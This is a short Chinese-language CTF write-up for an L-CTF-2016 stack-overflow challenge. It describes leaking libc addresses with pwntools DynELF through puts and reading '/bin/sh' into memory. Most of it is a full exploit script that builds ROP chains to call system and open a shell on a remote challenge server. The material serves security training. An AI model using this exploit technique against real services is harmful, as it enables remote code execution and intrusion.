题目来源: L-CTF-2016
题目描述:暂无
题目存在栈溢出,未给libc,但是有puts,因此可以考虑DynELF获取system地址之后,用read读入"/bin/sh"之后获取shell
注意点是,每次要回到main函数,这样能调整栈帧,否则可能会出现诸如environ被更改导致无法成功shell的问题
exp如下:
from pwn import * puts_addr = 0x400500 read_addr = 0x400520 main_addr = 0x4006B8 goal_addr = 0x601100 pop_rdi = 0x400763 pop_rsi_r15 = 0x400761 def leak(address): payload = b‘a‘ * 72 + p64(pop_rdi) + p64(address) + p64(puts_addr) payload += p64(main_addr) payload = payload.ljust(200, b‘\x90‘) io.send(payload) io.recvuntil(‘bye~\n‘) data = b‘‘ last = b‘‘ while True: now = io.recv(1, timeout = 0.2) if last == b‘\n‘ and now == b‘‘: data = data[:-1] data += b‘\x00‘ break else: data += now last = now return data #io = process(‘./pwn‘) io = remote(‘111.200.241.244‘, 53187) d = DynELF(leak, elf = ELF(‘./pwn‘)) system_addr = d.lookup(‘system‘, ‘libc‘) info("system:" + str(hex(system_addr))) payload = b‘a‘ * 72 + p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(goal_addr) payload += p64(0) + p64(read_addr) + p64(main_addr) payload = payload.ljust(200, b‘\x90‘) io.send(payload) io.recvuntil(‘bye~\n‘) io.send(b‘/bin/sh\x00‘) payload = b‘a‘ * 72 + p64(pop_rdi) + p64(goal_addr) payload += p64(pop_rsi_r15) + p64(0) + p64(0) + p64(system_addr) payload = payload.ljust(200, b‘\x90‘) sleep(0.5) io.send(payload) io.interactive()
原文:https://www.cnblogs.com/hktk1643/p/15145265.html